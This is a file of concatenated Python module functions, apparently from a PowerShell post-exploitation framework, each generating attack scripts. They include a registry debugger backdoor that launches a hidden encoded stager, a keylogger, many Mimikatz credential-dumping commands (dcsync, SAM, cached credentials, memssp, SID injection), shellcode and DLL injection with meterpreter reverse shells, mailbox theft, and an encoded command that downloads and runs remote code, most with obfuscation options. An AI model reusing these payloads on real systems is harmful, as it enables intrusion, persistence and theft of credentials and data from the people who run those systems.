def generate(self, obfuscate=False, obfuscationCommand=""): # management options cleanup = self.options['Cleanup']['Value'] triggerBinary = self.options['TriggerBinary']['Value'] listenerName = self.options['Listener']['Value'] targetBinary = self.options['TargetBinary']['Value'] # storage options regPath = self.options['RegPath']['Value'] statusMsg = "" locationString = "" if cleanup.lower() == 'true': # the registry command to disable the debugger for Utilman.exe script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s';'%s debugger removed.'" %(targetBinary, targetBinary) if obfuscate: script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) return script if listenerName != '': # if there's a listener specified, generate a stager and store it if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # generate the PowerShell one-liner launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell') encScript = launcher.split(" ")[-1] # statusMsg += "using listener " + listenerName path = "\\".join(regPath.split("\\")[0:-1]) name = regPath.split("\\")[-1] statusMsg += " stored in " + regPath + "." script = "$RegPath = '"+regPath+"';" script += "$parts = $RegPath.split('\\');" script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';" script += "$name = $parts[-1];" script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";" # note where the script is stored locationString = "$((gp "+path+" "+name+")."+name+")" script += "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"' -Name Debugger -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \\\"-enc $x\\\" powershell\";exit;';'"+targetBinary+" debugger set to trigger stager for listener "+listenerName+"'" else: # the registry command to set the debugger for the specified binary to be the binary path specified script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"' -Name Debugger -Value '"+triggerBinary+"';'"+targetBinary+" debugger set to "+triggerBinary+"'" if obfuscate: script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): cleanup = self.options['CleanUp']['Value'] if cleanup.lower() == 'true': script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 0; 'Machine account password change re-enabled.'" if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 1; 'Machine account password change disabled.'" if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-Keystrokes.ps1" try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Get-Keystrokes " for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # build the dump command with whatever options we want scriptEnd = "Invoke-Mimikatz -DumpCreds;" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1" try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() # get just the code needed for the specified function script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) script += moduleName + " " for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " " + str(values['Value']) script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # build the custom command with whatever options we want scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-Message { [CmdletBinding()] Param ( [Parameter(Mandatory = $True, Position = 0)] [String] $MsgText, [Parameter(Mandatory = $False, Position = 1)] [String] $IconType = 'Critical', [Parameter(Mandatory = $False, Position = 2)] [String] $Title = 'ERROR - 0xA801B720' ) Add-Type -AssemblyName Microsoft.VisualBasic $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title) } Invoke-Message""" for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "computername": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = """ Function Invoke-VoiceTroll { [CmdletBinding()] Param ( [Parameter(Mandatory = $True, Position = 0)] [ValidateNotNullOrEmpty()] [String] $VoiceText ) Set-StrictMode -version 2 Add-Type -AssemblyName System.Speech $synth = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer $synth.Speak($VoiceText) } Invoke-VoiceTroll""" for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "computername": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode + "\n" scriptEnd = moduleName + " " for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SPN.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nGet-SPN" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += " -List yes | Format-Table -Wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w") script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'" if obfuscate: script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-EgressCheck.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # Need to actually run the module that has been loaded scriptEnd = 'Invoke-EgressCheck' # add any arguments to the end execution of the script for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nExploit-Jenkins" scriptEnd += " -Rhost "+str(self.options['Rhost']['Value']) scriptEnd += " -Port "+str(self.options['Port']['Value']) command = str(self.options['Cmd']['Value']) # if the command contains spaces, wrap it in quotes before passing to ps script if " " in command: scriptEnd += " -Cmd \"" + command + "\"" else: scriptEnd += " -Cmd " + command if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "" if self.options['Method']['Value'].lower() == "sekurlsa": scriptEnd += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'" else: scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-Portscan.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-PortScan -noProgressMeter -f" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/trollsploit/Get-RickAstley.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" script = f.read() f.close() scriptEnd = moduleName + " " scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # build the custom command with whatever options we want command = "misc::memssp" # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-ReverseDNSLookup.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-ReverseDNSLookup" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) # only return objects where HostName is not an IP (i.e. the address resolves) scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() # get just the code needed for the specified function script = moduleCode scriptEnd = "\nFind-KeePassconfig | Get-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"lsadump::dcsync /user:"******"domain"]['Value'] != "": scriptEnd += " /domain:" + self.options['domain']['Value'] if self.options["dc"]['Value'] != "": scriptEnd += " /dc:" + self.options['dc']['Value'] scriptEnd += "\"';" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = "(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\")).Translate([System.Security.Principal.SecurityIdentifier]).Value" %(self.options['Domain']['Value'], self.options['User']['Value']) if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # ridiculous escape format groups = " ".join(['"\\""'+group.strip().strip("'\"")+'"""' for group in self.options["Groups"]['Value'].split(",")]) # build the custom command with whatever options we want command = '""misc::addsid '+self.options["User"]['Value'] + ' ' + groups # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-WinEnum " # add any arguments to the end execution of the script for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-NinjaCopy.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "$null = Invoke-NinjaCopy " for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nInvoke-Shellcode -Force" listenerName = self.options['Listener']['Value'] if listenerName != "": if not self.mainMenu.listeners.is_listener_valid(listenerName): print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # TODO: redo pulling these listener configs... #Old method no longer working #temporary fix until a more elegant solution is in place, unless this is the most elegant???? :) #[ID,name,host,port,cert_path,staging_key,default_delay,default_jitter,default_profile,kill_date,working_hours,listener_type,redirect_target,default_lost_limit] = self.mainMenu.listeners.get_listener(listenerName) host = self.mainMenu.listeners.loadedListeners['meterpreter'].options['Host']['Value'] port = self.mainMenu.listeners.loadedListeners['meterpreter'].options['Port']['Value'] MSFpayload = "reverse_http" if "https" in host: MSFpayload += "s" hostname = host.split(":")[1].strip("/") self.options['Lhost']['Value'] = str(hostname) self.options['Lport']['Value'] = str(port) self.options['Payload']['Value'] = str(MSFpayload) for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "listener": if values['Value'] and values['Value'] != '': if option.lower() == "payload": payload = "windows/meterpreter/" + str(values['Value']) scriptEnd += " -" + str(option) + " " + payload elif option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += "; 'Shellcode injected.'" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] folderName = self.options['FolderName']['Value'] maxEmails = self.options['MaxEmails']['Value'] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode + "\n" scriptEnd = "Get-OutlookFolder -Name '%s' | Get-EmailItems -MaxEmails %s" %(folderName, maxEmails) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/recon/HTTP-Login.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nTest-Login" for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "showall": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += " | Out-String" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-DllInjection.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nInvoke-DllInjection" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-ShellcodeMSIL" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd # Get the random function name generated at install and patch the stager with the proper function name conn = self.get_db_connection() self.lock.acquire() cur = conn.cursor() cur.execute("SELECT Invoke_Mimikatz FROM functions") replacement = cur.fetchone() cur.close() self.lock.release() script = script.replace("Invoke-Mimikatz", replacement[0]) return script
